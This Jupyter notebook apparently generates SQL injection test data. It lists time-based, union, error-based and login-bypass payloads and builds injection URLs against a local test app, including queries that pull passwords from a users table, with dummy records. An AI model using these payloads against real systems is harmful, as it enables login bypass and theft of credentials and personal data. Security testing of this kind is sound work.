plain text inject

In [58]:
#Time Based SQL Injection
Time_Based =[''' ' ;waitfor delay '0:0:5'-- ''',
''' ' );waitfor delay '0:0:5'-- ''',
''' ' ;waitfor delay '0:0:5'-- ''',
''' ' );waitfor delay '0:0:5'-- ''',
''' ' ));waitfor delay '0:0:5'-- ''',
''' ' ));waitfor delay '0:0:5'-- ''',
''' ' benchmark(10000000,MD5(1))#''',
''' ' 1 or benchmark(10000000,MD5(1))#''',
''' '(1)r benchmark(10000000,MD5(1))#''',
''' ' or benchmark(10000000,MD5(1))#''',
''' ' 1) or benchmark(10000000,MD5(1))#''',
''' ' ) or benchmark(10000000,MD5(1))#''',
''' ' ) or benchmark(10000000,MD5(1))#''',
''' ' 1)) or benchmark(10000000,MD5(1))#''',
''' ' )) or benchmark(10000000,MD5(1))#''',
''' ' 1 or pg_sleep(5)-- ''',
''' ' (1)r pg_sleep(5)-- ''',
''' ' or pg_sleep(5)-- ''',
''' ' 1) or pg_sleep(5)-- ''',
''' ' ) or pg_sleep(5)-- ''',
''' ' ) or pg_sleep(5)-- ''',
''' ' 1)) or pg_sleep(5)-- ''',
''' ' )) or pg_sleep(5)-- ''',
''' ' )) or pg_sleep(5)-- ''',
''' ' AND (SELECT * FROM (SELECT(SLEEP(5)))bAKL) AND 'vRxe'='vRxe''',
''' ' AND (SELECT * FROM (SELECT(SLEEP(5)))YjoC) AND '%'=' ''',
''' ' AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)''',
''' ' AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)-- ''',
''' ' AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)#''',
''' ' SLEEP(5)#''',
''' ' SLEEP(5)-- ''',
''' ' SLEEP(5)=" ''',
''' ' (1)r SLEEP(5)''',
''' ' (1)r SLEEP(5)#''',
''' ' (1)r SLEEP(5)-- ''',
''' ' (1)r SLEEP(5)="''',
''' ' waitfor delay '00:00:05' ''',
''' ' waitfor delay '00:00:05'-- ''',
''' ' waitfor delay '00:00:05'#''',
''' ' benchmark(50000000,MD5(1))''',
''' ' benchmark(50000000,MD5(1))-- ''',
''' ' benchmark(50000000,MD5(1))#''']

In [47]:
#Union Select
union_based = [ 
     " ' ORDER BY SLEEP(5)#",
     " ' ORDER BY 1,SLEEP(5)#",
     " ' ORDER BY 1,SLEEP(5),3#",
     " ' ORDER BY 1,SLEEP(5),3,4#",
     ''' ' ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5("A")),4,5#''',
     " ' ORDER BY SLEEP(5)-- ",
     " ' ORDER BY 1,SLEEP(5)-- ",
     " ' ORDER BY 1,SLEEP(5),3-- ",
     " ' ORDER BY 1,SLEEP(5),3,4-- ",
     ''' ' ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5("A")),4,5-- ''',
     " ' UNION ALL SELECT 1",
     " ' UNION ALL SELECT 1,2",
     " ' UNION ALL SELECT 1,2,3",
     " ' UNION ALL SELECT 1#",
     " ' UNION ALL SELECT 1,2#",
     " ' UNION ALL SELECT 1,2,3#",
     " ' UNION ALL SELECT 1,2,3,4#",
     " ' UNION ALL SELECT 1-- ",
     " ' UNION ALL SELECT 1,2-- ",
     " ' UNION ALL SELECT 1,2,3-- ",
     " ' UNION ALL SELECT 1,2,3,4-- ",
     " ' UNION SELECT @@VERSION,SLEEP(5),3",
     " ' UNION SELECT @@VERSION,SLEEP(5),USER(),4",
     ''' ' UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5("A")),5''',
     ''' ' UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5("A")),5,6''',
     ''' ' UNION SELECT @@VERSION,SLEEP(5),USER(),4#''',
     ''' ' UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5("A")),5#''',
     ''' ' UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5("A")),5,6#''',
     ''' ' UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5("A")),NULL,NULL -- ''',
     ''' ' UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5("A")),NULL,NULL,NULL -- '''
     ]

In [60]:
Bypass = [
    ''' ' or true -- ''",
    " ' or true -- ",
    " ' or true -- ",
    " ) or true -- ",
    " ') or true -- ",
    " ' or 'x'='x",
    " ') or ('x')=('x",
    " ') or (('x'))=(('x",
    ''' ' or "x"="x ''',
    ''' ') or ("x")=("x ''',
    ''' ')) or (("x"))=(("x ''',
    " ' or 1=1",
    " ' or 1=1-- ",
    " ' or 1=1#",
    " ' or 1=1/*",
    " ' -- ",
    "' #",
    "'/*",
    "' or '1'='1",
    "' or '1'='1'-- ",
    "' or '1'='1'#",
    "' or '1'='1'/*",
    "'or 1=1 or ''='",
    "' or 1=1",
    "' or 1=1-- ",
    "' or 1=1#",
    "' or 1=1/*",
    "') or ('1'='1",
    "') or ('1'='1'-- ",
    "') or ('1'='1'#",
    "') or ('1'='1'/*",
    "') or '1'='1",
    "') or '1'='1'-- ",
    "') or '1'='1'#",
    "') or '1'='1'/*",
    ''' 1234 ' AND 1=0 UNION ALL SELECT 'admin", '81dc9bdb52d04dc20036dbd8313ed055 ''',
    ''' \" -- " ''',
    ''' \" #''',
    ''' \"/*''',
    ''' \' Or \"1\"=\"1 ''',
    ''' \' Or \"1\"=\"1\"-- ''',
    ''' \' Or \"1\"=\"1\"# ''',
    ''' \' Or \"1\"=\"1\"/* ''',
    ''' \"or 1=1 or \"\"=\" ''',
    ''' \' Or 1=1''',
    ''' \' Or 1=1-- ''',
    ''' \' Or 1=1#''',
    ''' \' Or 1=1/*''',
    ''' \") or (\"1\"=\"1''',
    ''' \") or (\"1\"=\"1\"-- ''',
    ''' \") or (\"1\"=\"1\"#''',
    ''' \") or (\"1\ '''
    ]

Gen-test-case!

In [24]:
import random

In [62]:
# errorbase -->
# Time_Based[]
# Bypass[]
table_name = ["employee","customer","service","users"]
user = ['lnwza007','eiei123']

In band
1.error-based
2.union

In [63]:
errorbase=[
"OR 1=1#",
"OR 1=0#",
"OR x=x#",
"OR x=y#",
"OR 1=1-- ",
"OR 1=0-- ",
"OR x=x-- ",
"OR x=y-- ",
"OR 3409=3409 AND ('pytW' LIKE 'pytW",
"OR 3409=3409 AND ('pytW' LIKE 'pytY",
"HAVING 1=1",
"HAVING 1=0",
"HAVING 1=1#",
"HAVING 1=0#",
"HAVING 1=1-- ",
"HAVING 1=0-- ",
"AND 1=1",
"AND 1=0",
"AND 1=1-- ",
"AND 1=0-- ",
"AND 1=1#",
"AND 1=0#",
"AND 1=1 AND '%'='",
"AND 1=0 AND '%'='",
"AND 1083=1083 AND (1427=1427",
"AND 7506=9091 AND (5913=5913",
"AND 1083=1083 AND ('1427=1427",
"AND 7506=9091 AND ('5913=5913",
"AND 7300=7300 AND 'pKlZ'='pKlZ",
"AND 7300=7300 AND 'pKlZ'='pKlY",
"AND 7300=7300 AND ('pKlZ'='pKlZ",
"AND 7300=7300 AND ('pKlZ'='pKlY",
"AS INJECTX WHERE 1=1 AND 1=1",
"AS INJECTX WHERE 1=1 AND 1=0",
"AS INJECTX WHERE 1=1 AND 1=1#",
"AS INJECTX WHERE 1=1 AND 1=0#",
"AS INJECTX WHERE 1=1 AND 1=1-- ",
"AS INJECTX WHERE 1=1 AND 1=0-- ",
"WHERE 1=1 AND 1=1",
"WHERE 1=1 AND 1=0",
"WHERE 1=1 AND 1=1#",
"WHERE 1=1 AND 1=0#",
"WHERE 1=1 AND 1=1-- ",
"WHERE 1=1 AND 1=0-- ",
"ORDER BY 1-- ",
"ORDER BY 2-- ",
"ORDER BY 3-- ",
"ORDER BY 4-- ",
"ORDER BY 5-- ",
"ORDER BY 6-- ",
"ORDER BY 7-- ",
"ORDER BY 8-- ",
"ORDER BY 9-- ",
"ORDER BY 10-- ",
"ORDER BY 11-- ",
"ORDER BY 12-- ",
"ORDER BY 13-- ",
"ORDER BY 14-- ",
"ORDER BY 15-- ",
"ORDER BY 16-- ",
"ORDER BY 17-- ",
"ORDER BY 18-- ",
"ORDER BY 19-- ",
"ORDER BY 20-- ",
"ORDER BY 21-- ",
"ORDER BY 22-- ",
"ORDER BY 23-- ",
"ORDER BY 24",
"ORDER BY 25",
"ORDER BY 26",
"ORDER BY 27",
"ORDER BY 28",
"ORDER BY 29",
"ORDER BY 30",
"ORDER BY 31337",
"RLIKE (SELECT (CASE WHEN (4346=4346) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'='",
"RLIKE (SELECT (CASE WHEN (4346=4347) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'='",
"IF(7423=7424) SELECT 7423 ELSE DROP FUNCTION xcjl-- ",
"IF(7423=7423) SELECT 7423 ELSE DROP FUNCTION xcjl-- ",
"%' AND 8310=8310 AND '%'='",
"%' AND 8310=8311 AND '%'='",
"and (select substring(@@version,1,1))='X'",
"and (select substring(@@version,1,1))='M'",
"and (select substring(@@version,2,1))='i'",
"and (select substring(@@version,2,1))='y'",
"and (select substring(@@version,3,1))='c'",
"and (select substring(@@version,3,1))='S'",
"and (select substring(@@version,3,1))='X'"]

In [64]:
def random_data(list_data):
    BP_gen=[]
    for i in range(30) :
        BP_gen.append(user[random.randint(0, len(user)-1)]+" ' "  +
        list_data[random.randint(0, len(list_data)-1)] )
    return BP_gen

In [65]:
random_data(errorbase)

["eiei123 ' %' AND 8310=8310 AND '%'='",
 "lnwza007 ' AND 1=1#",
 "eiei123 ' ORDER BY 4-- ",
 "eiei123 ' AND 7300=7300 AND 'pKlZ'='pKlZ",
 "eiei123 ' HAVING 1=0#",
 "lnwza007 ' ORDER BY 19-- ",
 "lnwza007 ' ORDER BY 10-- ",
 "eiei123 ' ORDER BY 5-- ",
 "eiei123 ' HAVING 1=1",
 "lnwza007 ' and (select substring(@@version,1,1))='M'"]

URL
(finished)

In [1]:
import random
url= "http://localhost:3000/employee?id="
see_able_col=["employee_id" ,
    "prefixname" ,
    "fname",
    "lname" ,
    "nickname" ,
    "email",
    "tel" ,
    "work_background" ,
    "graduation_certificate" ,
    "address" ,
    "id_card" ,
    "house_registration" ]
unsee_col=["price",
            "name",
            "tel",
            "email",
            "lname",
            "fname",
            "customer_id",
            "username",
            "password"
            ]
see_able_value= [("E001", "Mr.", "bobo1", "two1", "baba1", "E001@gmail.com", '0123456781' , "companyA, companyB", "XAU", "123 r.xxxxx 50200", "1530302340921", "123 r.xxxxx 54000"), 
       ("E002", "Mr.", "bobo2", "two2", "baba2", "E002@gmail.com", '0123456782' , "companyA, companyB", "XAU", "123 r.xxxxx 50200", "1530302340922", '123 r.xxxxx 54000'), 
       ("E003", "Mr.", "bobo3", "two3", "baba3", "E003@gmail.com", '0123456783' , "companyA, companyB", "XAU", "123 r.xxxxx 50200", "1530302340923", '123 r.xxxxx 54000'), 
       ("E004", "Mr.", "bobo4", "two4", "baba4", "E004@gmail.com", '0123456784' , "companyA, companyB", "XAU", "123 r.xxxxx 50200", "1530302340924", '123 r.xxxxx 54000'), 
       ("E005", "Mr.", "bobo5", "two5", "baba5", "E005@gmail.com", '0123456785' , "companyA, companyB", "XAU", "123 r.xxxxx 50200", "1530302340925", '123 r.xxxxx 54000')]
unsee_value={"price":["100","200","300","400"],
            "name":["A","B","C","D"],
            "tel":["0123456781", "0123456782"],
            "email":["E001@gmail.com", "E002@gmail.com"],
            "lname":["memo1", "memo2"],
            "fname":["one1", "one2"],
            "customer_id":["C001","C002"],
            "username":["lnwza007","eiei123"],
            "password":["123","123"]}

unsee_table =["users","service","customer"]

table_value ={"users":["username","password"],
              "service":["name","price"],
              "customer":["fname","customer_id","lname","email","tel"]
            }

In [3]:
unsee_t=unsee_table[random.randint(0, len(unsee_table)-1)]
print(unsee_t)
table_V=table_value[unsee_t][random.randint(0, len(table_value[unsee_t])-1)]
print(table_V)
unsee_v=unsee_value[table_V][random.randint(0, len(unsee_value[table_V])-1)]

print(unsee_v)

users
password
123

In [68]:
def random_urldata(url,list_data,value):
    gen=[]
    for i in range(30) :
        random_table_value=random.randint(0, len(value)-1)
        gen.append(url+(value[random_table_value][0])
        +list_data[random.randint(0, len(list_data)-1)])
    return gen

In [69]:
random_urldata(url,errorbase,see_able_value)

["http://localhost:3000/employee?id=E002AND 1083=1083 AND ('1427=1427",
 'http://localhost:3000/employee?id=E004ORDER BY 14-- ',
 'http://localhost:3000/employee?id=E001AND 1=1',
 'http://localhost:3000/employee?id=E002AND 1=0-- ',
 'http://localhost:3000/employee?id=E004HAVING 1=0-- ',
 'http://localhost:3000/employee?id=E005OR x=x#',
 'http://localhost:3000/employee?id=E002HAVING 1=0#',
 'http://localhost:3000/employee?id=E004ORDER BY 24',
 'http://localhost:3000/employee?id=E004ORDER BY 8-- ',
 'http://localhost:3000/employee?id=E001ORDER BY 27',
 'http://localhost:3000/employee?id=E003HAVING 1=0#',
 'http://localhost:3000/employee?id=E003AS INJECTX WHERE 1=1 AND 1=1',
 'http://localhost:3000/employee?id=E005OR 1=0-- ',
 "http://localhost:3000/employee?id=E003AND 7300=7300 AND ('pKlZ'='pKlY",
 'http://localhost:3000/employee?id=E001ORDER BY 6-- ',
 'http://localhost:3000/employee?id=E005ORDER BY 21-- ',
 'http://localhost:3000/employee?id=E002AS INJECTX WHERE 1=1 AND 1=1#',
 'http://localhost:3000/employee?id=E004HAVING 1=1#',
 "http://localhost:3000/employee?id=E001OR 3409=3409 AND ('pytW' LIKE 'pytW",
 'http://localhost:3000/employee?id=E005ORDER BY 7-- ',
 'http://localhost:3000/employee?id=E003ORDER BY 6-- ',
 'http://localhost:3000/employee?id=E002ORDER BY 25',
 'http://localhost:3000/employee?id=E002ORDER BY 19-- ',
 'http://localhost:3000/employee?id=E002ORDER BY 18-- ',
 'http://localhost:3000/employee?id=E005OR 1=0-- ',
 'http://localhost:3000/employee?id=E002ORDER BY 27',
 'http://localhost:3000/employee?id=E002HAVING 1=1',
 'http://localhost:3000/employee?id=E003AND 1=0',
 "http://localhost:3000/employee?id=E001AND 1=0 AND '%'='",
 'http://localhost:3000/employee?id=E001IF(7423=7424) SELECT 7423 ELSE DROP FUNCTION xcjl-- ']

In [48]:
def randomunion_urldata(url,list_data,value):
    gen=[]
    for i in range(10) :
        random_table_value=random.randint(0, len(value)-1)
        gen.append(url+(value[random_table_value][0])
        +list_data[random.randint(0, len(list_data )-1)])
    return gen

In [49]:
randomunion_urldata(url,union_based ,see_able_value)

["http://localhost:3000/employee?id=E004 ' UNION SELECT @@VERSION,SLEEP(5),USER(),4",
 "http://localhost:3000/employee?id=E002 ' UNION ALL SELECT 1,2-- ",
 "http://localhost:3000/employee?id=E003 ' ORDER BY 1,SLEEP(5)-- ",
 "http://localhost:3000/employee?id=E004 ' UNION ALL SELECT 1",
 'http://localhost:3000/employee?id=E004 \' ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5("A")),4,5-- ',
 "http://localhost:3000/employee?id=E005 ' ORDER BY 1,SLEEP(5)#",
 "http://localhost:3000/employee?id=E003 ' UNION SELECT @@VERSION,SLEEP(5),3",
 'http://localhost:3000/employee?id=E002 \' UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5("A")),5,6',
 "http://localhost:3000/employee?id=E001 ' ORDER BY SLEEP(5)-- ",
 "http://localhost:3000/employee?id=E001 ' UNION SELECT @@VERSION,SLEEP(5),USER(),4#"]

In [4]:
def randomunionWrealdata_urldata(url,value,table_value,unsee_table,unsee_value):
    gen=[]
    for i in range(100) :
        unsee_t=unsee_table[random.randint(0, len(unsee_table)-1)] #select table
        table_V=table_value[unsee_t][random.randint(0, len(table_value[unsee_t])-1)] # colum
        unsee_v=unsee_value[table_V][random.randint(0, len(unsee_value[table_V])-1)] # value in that column
        random_table_value=random.randint(0, len(value)-1)
        gen.append(url+(value[random_table_value][0])+' " '
        +"UNION SELECT "+ table_V + " " + "FROM " +unsee_t+ "-- ")
    return gen

In [5]:
randomunionWrealdata_urldata(url,see_able_value,table_value,unsee_table,unsee_value)

['http://localhost:3000/employee?id=E001 " UNION SELECT price FROM service-- ',
 'http://localhost:3000/employee?id=E005 " UNION SELECT password FROM users-- ',
 'http://localhost:3000/employee?id=E004 " UNION SELECT username FROM users-- ',
 'http://localhost:3000/employee?id=E002 " UNION SELECT price FROM service-- ',
 'http://localhost:3000/employee?id=E002 " UNION SELECT username FROM users-- ',
 'http://localhost:3000/employee?id=E004 " UNION SELECT fname FROM customer-- ',
 'http://localhost:3000/employee?id=E002 " UNION SELECT username FROM users-- ',
 'http://localhost:3000/employee?id=E003 " UNION SELECT tel FROM customer-- ',
 'http://localhost:3000/employee?id=E002 " UNION SELECT price FROM service-- ',
 'http://localhost:3000/employee?id=E005 " UNION SELECT username FROM users-- ',
 'http://localhost:3000/employee?id=E001 " UNION SELECT lname FROM customer-- ',
 'http://localhost:3000/employee?id=E003 " UNION SELECT fname FROM customer-- ',
 'http://localhost:3000/employee?id=E004 " UNION SELECT username FROM users-- ',
 'http://localhost:3000/employee?id=E002 " UNION SELECT username FROM users-- ',
 'http://localhost:3000/employee?id=E002 " UNION SELECT name FROM service-- ',
 'http://localhost:3000/employee?id=E003 " UNION SELECT username FROM users-- ',
 'http://localhost:3000/employee?id=E002 " UNION SELECT username FROM users-- ',
 'http://localhost:3000/employee?id=E001 " UNION SELECT password FROM users-- ',
 'http://localhost:3000/employee?id=E005 " UNION SELECT name FROM service-- ',
 'http://localhost:3000/employee?id=E005 " UNION SELECT price FROM service-- ',
 'http://localhost:3000/employee?id=E004 " UNION SELECT fname FROM customer-- ',
 'http://localhost:3000/employee?id=E002 " UNION SELECT name FROM service-- ',
 'http://localhost:3000/employee?id=E001 " UNION SELECT email FROM customer-- ',
 'http://localhost:3000/employee?id=E001 " UNION SELECT name FROM service-- ',
 'http://localhost:3000/employee?id=E005 " UNION SELECT name FROM service-- ',
 'http://localhost:3000/employee?id=E005 " UNION SELECT name FROM service-- ',
 'http://localhost:3000/employee?id=E004 " UNION SELECT name FROM service-- ',
 'http://localhost:3000/employee?id=E001 " UNION SELECT tel FROM customer-- ',
 'http://localhost:3000/employee?id=E001 " UNION SELECT customer_id FROM customer-- ',
 'http://localhost:3000/employee?id=E002 " UNION SELECT lname FROM customer-- ',
 'http://localhost:3000/employee?id=E005 " UNION SELECT lname FROM customer-- ',
 'http://localhost:3000/employee?id=E003 " UNION SELECT password FROM users-- ',
 'http://localhost:3000/employee?id=E002 " UNION SELECT price FROM service-- ',
 'http://localhost:3000/employee?id=E002 " UNION SELECT fname FROM customer-- ',
 'http://localhost:3000/employee?id=E002 " UNION SELECT name FROM service-- ',
 'http://localhost:3000/employee?id=E004 " UNION SELECT password FROM users-- ',
 'http://localhost:3000/employee?id=E005 " UNION SELECT price FROM service-- ',
 'http://localhost:3000/employee?id=E004 " UNION SELECT lname FROM customer-- ',
 'http://localhost:3000/employee?id=E004 " UNION SELECT tel FROM customer-- ',
 'http://localhost:3000/employee?id=E003 " UNION SELECT username FROM users-- ',
 'http://localhost:3000/employee?id=E004 " UNION SELECT price FROM service-- ',
 'http://localhost:3000/employee?id=E004 " UNION SELECT password FROM users-- ',
 'http://localhost:3000/employee?id=E003 " UNION SELECT email FROM customer-- ',
 'http://localhost:3000/employee?id=E005 " UNION SELECT name FROM service-- ',
 'http://localhost:3000/employee?id=E002 " UNION SELECT fname FROM customer-- ',
 'http://localhost:3000/employee?id=E003 " UNION SELECT name FROM service-- ',
 'http://localhost:3000/employee?id=E001 " UNION SELECT lname FROM customer-- ',
 'http://localhost:3000/employee?id=E002 " UNION SELECT price FROM service-- ',
 'http://localhost:3000/employee?id=E005 " UNION SELECT tel FROM customer-- ',
 'http://localhost:3000/employee?id=E001 " UNION SELECT password FROM users-- ',
 'http://localhost:3000/employee?id=E004 " UNION SELECT lname FROM customer-- ',
 'http://localhost:3000/employee?id=E003 " UNION SELECT password FROM users-- ',
 'http://localhost:3000/employee?id=E003 " UNION SELECT customer_id FROM customer-- ',
 'http://localhost:3000/employee?id=E001 " UNION SELECT password FROM users-- ',
 'http://localhost:3000/employee?id=E002 " UNION SELECT name FROM service-- ',
 'http://localhost:3000/employee?id=E004 " UNION SELECT fname FROM customer-- ',
 'http://localhost:3000/employee?id=E002 " UNION SELECT customer_id FROM customer-- ',
 'http://localhost:3000/employee?id=E003 " UNION SELECT customer_id FROM customer-- ',
 'http://localhost:3000/employee?id=E004 " UNION SELECT password FROM users-- ',
 'http://localhost:3000/employee?id=E005 " UNION SELECT name FROM service-- ',
 'http://localhost:3000/employee?id=E003 " UNION SELECT lname FROM customer-- ',
 'http://localhost:3000/employee?id=E003 " UNION SELECT fname FROM customer-- ',
 'http://localhost:3000/employee?id=E001 " UNION SELECT password FROM users-- ',
 'http://localhost:3000/employee?id=E004 " UNION SELECT name FROM service-- ',
 'http://localhost:3000/employee?id=E004 " UNION SELECT email FROM customer-- ',
 'http://localhost:3000/employee?id=E002 " UNION SELECT password FROM users-- ',
 'http://localhost:3000/employee?id=E003 " UNION SELECT name FROM service-- ',
 'http://localhost:3000/employee?id=E003 " UNION SELECT password FROM users-- ',
 'http://localhost:3000/employee?id=E004 " UNION SELECT username FROM users-- ',
 'http://localhost:3000/employee?id=E003 " UNION SELECT password FROM users-- ',
 'http://localhost:3000/employee?id=E003 " UNION SELECT price FROM service-- ',
 'http://localhost:3000/employee?id=E001 " UNION SELECT username FROM users-- ',
 'http://localhost:3000/employee?id=E002 " UNION SELECT password FROM users-- ',
 'http://localhost:3000/employee?id=E001 " UNION SELECT name FROM service-- ',
 'http://localhost:3000/employee?id=E004 " UNION SELECT username FROM users-- ',
 'http://localhost:3000/employee?id=E005 " UNION SELECT email FROM customer-- ',
 'http://localhost:3000/employee?id=E002 " UNION SELECT price FROM service-- ',
 'http://localhost:3000/employee?id=E001 " UNION SELECT price FROM service-- ',
 'http://localhost:3000/employee?id=E005 " UNION SELECT customer_id FROM customer-- ',
 'http://localhost:3000/employee?id=E002 " UNION SELECT fname FROM customer-- ',
 'http://localhost:3000/employee?id=E002 " UNION SELECT lname FROM customer-- ',
 'http://localhost:3000/employee?id=E001 " UNION SELECT price FROM service-- ',
 'http://localhost:3000/employee?id=E001 " UNION SELECT password FROM users-- ',
 'http://localhost:3000/employee?id=E004 " UNION SELECT fname FROM customer-- ',
 'http://localhost:3000/employee?id=E003 " UNION SELECT name FROM service-- ',
 'http://localhost:3000/employee?id=E004 " UNION SELECT password FROM users-- ',
 'http://localhost:3000/employee?id=E003 " UNION SELECT tel FROM customer-- ',
 'http://localhost:3000/employee?id=E001 " UNION SELECT price FROM service-- ',
 'http://localhost:3000/employee?id=E004 " UNION SELECT username FROM users-- ',
 'http://localhost:3000/employee?id=E003 " UNION SELECT username FROM users-- ',
 'http://localhost:3000/employee?id=E003 " UNION SELECT price FROM service-- ',
 'http://localhost:3000/employee?id=E003 " UNION SELECT name FROM service-- ',
 'http://localhost:3000/employee?id=E004 " UNION SELECT customer_id FROM customer-- ',
 'http://localhost:3000/employee?id=E004 " UNION SELECT name FROM service-- ',
 'http://localhost:3000/employee?id=E001 " UNION SELECT password FROM users-- ',
 'http://localhost:3000/employee?id=E002 " UNION SELECT username FROM users-- ',
 'http://localhost:3000/employee?id=E004 " UNION SELECT customer_id FROM customer-- ',
 'http://localhost:3000/employee?id=E002 " UNION SELECT price FROM service-- ',
 'http://localhost:3000/employee?id=E004 " UNION SELECT username FROM users-- ',
 'http://localhost:3000/employee?id=E002 " UNION SELECT username FROM users-- ']

In [ ]:
random_urldata(url,Time_Based,see_able_value)

["http://localhost:3000/employee?id=E002 ' AND (SELECT * FROM (SELECT(SLEEP(5)))YjoC) AND '%'=' ",
 "http://localhost:3000/employee?id=E002 ' 1)) or pg_sleep(5)-- ",
 "http://localhost:3000/employee?id=E005 ' )) or benchmark(10000000,MD5(1))#",
 "http://localhost:3000/employee?id=E003 ' ));waitfor delay '0:0:5'-- ",
 "http://localhost:3000/employee?id=E003 ' 1)) or benchmark(10000000,MD5(1))#",
 "http://localhost:3000/employee?id=E003 ' AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)-- ",
 "http://localhost:3000/employee?id=E005 ' (1)r SLEEP(5)-- ",
 "http://localhost:3000/employee?id=E005 ' ) or pg_sleep(5)-- ",
 "http://localhost:3000/employee?id=E003 ' ;waitfor delay '0:0:5'-- ",
 "http://localhost:3000/employee?id=E002 ' 1)) or pg_sleep(5)-- "]

In [2]:
import string
import random

showList = ["DATABASES", "TABLES", "COLUME"]

last = ["#", "# ", "-- "]
table =["users","service","customer", "employee"]
operator = [" OR ", " AND ", ""]

table_value ={"users":["username","password"],
              "service":["name","price"],
              "customer":["fname","customer_id","lname","email","tel"],
              "employee":["employee_id", "prefixname", "fname", "lname", "nickname", "email", "tel", "work_background", "graduation_certificate", "address", "id_card", "house_registration"]
            }

type_of_value = {"username":"str",
"fname":"str",
"lname":"str",
"name":"str",
"prefixname":"str",
"nickname":"str",
"password":"both",
"customer_id":"both",
"email":"both",
"employee_id":"both",
"work_background":"both",
"graduation_certificate":"both",
"address":"both",
"house_registration":"both",
"tel":"tel",
"price":"price",
"id_card":"id_card"}


customer_value = [{"username":"Emma","password":"u8N6tK9g"},{"username1":"Noah","password1":"p7H5jM6z"},
{"username":"Olivia","password":"h9L8kQ2t"},{"username1":"Liam","password1":"z5T8gP9u"},
{"username":"Ava","password":"b8K6tH7m"},{"username1":"Mason","password1":"y2Q9uH5t"},
{"username":"Sophia","password":"m6J8hK7z"},{"username1":"Jacob","password1":"w8T6pH9g"},
{"username":"Isabella","password":"x5P9uN8t"},{"username1":"William","password1":"g8K7tZ9h"},
{"username":"Mia","password":"t8J6pH7u"},{"username1":"Ethan","password1":"y9L8kQ5t"},
{"username":"Charlotte","password":"m7H9jK8z"},{"username1":"James","password1":"w6T7pH5g"},
{"username":"Amelia","password":"x8P6uN7t"},{"username1":"Alexander","password1":"g7K9tZ8h"},
{"username":"Abigail","password":"t6J8pH9u"},{"username1":"Michael","password1":"y5L7kQ8t"},
{"username":"Emily","password":"m8H6jK9z"},{"username1":"Benjamin","password1":"w7T9pH6g"},
{"username":"Elizabeth","password":"x6P8uN5t"},{"username1":"Matthew","password1":"g9K7tZ7h"},
{"username":"Avery","password":"t8J9pH6u"},{"username1":"Daniel","password1":"y7L8kQ9t"},
{"username":"Sofia","password":"m6H7jK8z"},{"username1":"Joseph","password1":"w5T6pH7g"},
{"username":"Evelyn","password":"x9P7uN8t"},{"username1":"Samuel","password1":"g7K8tZ9h"},
{"username":"Aubrey","password":"t7J6pH8u"},{"username1":"Christopher","password1":"y8L9kQ7t"},
{"username":"Harper","password":"m9H7jK6z"},{"username1":"Nathan","password1":"w6T8pH5g"},
{"username":"Aria","password":"x7P9uN7t"},{"username1":"Ryan","password1":"g8K7tZ9h"},
{"username":"Adalynn","password":"t6J8pH9u"},{"username1":"Andrew","password1":"y5L7kQ8t"},
{"username":"Ellie","password":"m8H6jK9z"},{"username1":"Oliver","password1":"w7T9pH6g"},
{"username":"Scarlett","password":"x6P8uN5t"},{"username1":"Henry","password1":"g9K7tZ7h"},
{"username":"Aaliyah","password":"t8J9pH6u"},{"username1":"Jaxon","password1":"y7L8kQ9t"}]


def generate_random_string_both() -> str:
    length = random.randint(4, 15)
    letters = string.ascii_letters + string.digits
    rand = ''.join(random.choice(letters) for i in range(length))
    final = '"' + rand + '"'
    return final

def generate_random_string_str() -> str:
    length = random.randint(4, 15)
    letters = string.ascii_letters
    rand = ''.join(random.choice(letters) for i in range(length))
    final = '"' + rand + '"'
    return final

def generate_random_string_tel() -> str:
    return "0" + str(random.randint(100000000, 999999999))

def generate_random_string_id_card() -> str:
    return "1" + str(random.randint(500000000000, 999999999999))

def generate_random_string_price() -> str:
    letters = string.digits
    return ''.join(random.choice(letters) for i in range(3))

In [3]:
def randomSelectForSearch(table, table_value, last):
    gen=[]
    for i in range(100) :
        preStr =""
        typeOfValue=[]
        random_table=table[random.randint(0, len(table)-1)]
        random_last=last[random.randint(0, len(last)-1)]
        preStr += r'\"; SELECT '
        
        numOfParam=random.randint(0, len(table_value[random_table])-1)
        if (numOfParam == 0):
            preStr += "*" + " FROM " + random_table + "" + random_last
        else:
            for j in range(numOfParam) :
                while True:
                    random_table_value=table_value[random_table][random.randint(0, len(table_value[random_table])-1)]
                    if random_table_value not in preStr:
                        typeOfValue.append(type_of_value[random_table_value])
                        break
                    continue 
                    
                preStr += random_table_value
                if j != numOfParam-1 :
                    preStr += ", "
            preStr += " FROM " + random_table
            preStr += "" + random_last
        
        if preStr in gen:
            continue
        else:
            gen.append(preStr)
    return gen

In [4]:
randomSelectForSearch(table, table_value, last)

['\\"; SELECT customer_id FROM customer#',
 '\\"; SELECT * FROM employee#',
 '\\"; SELECT customer_id, tel, lname FROM customer-- ',
 '\\"; SELECT lname, nickname FROM employee#',
 '\\"; SELECT * FROM users# ',
 '\\"; SELECT employee_id, graduation_certificate, id_card, email, house_registration, tel, lname, nickname, work_background FROM employee# ',
 '\\"; SELECT tel FROM customer# ',
 '\\"; SELECT * FROM customer#',
 '\\"; SELECT * FROM customer# ',
 '\\"; SELECT * FROM service# ',
 '\\"; SELECT fname, house_registration, nickname, lname, id_card, graduation_certificate, employee_id, prefixname, tel FROM employee-- ',
 '\\"; SELECT tel, prefixname, work_background, house_registration, email, id_card, graduation_certificate, employee_id FROM employee#',
 '\\"; SELECT id_card, fname, prefixname FROM employee-- ',
 '\\"; SELECT * FROM service#',
 '\\"; SELECT email, address, id_card, prefixname FROM employee#',
 '\\"; SELECT house_registration, prefixname, address, email, lname, nickname, id_card, graduation_certificate, tel FROM employee# ',
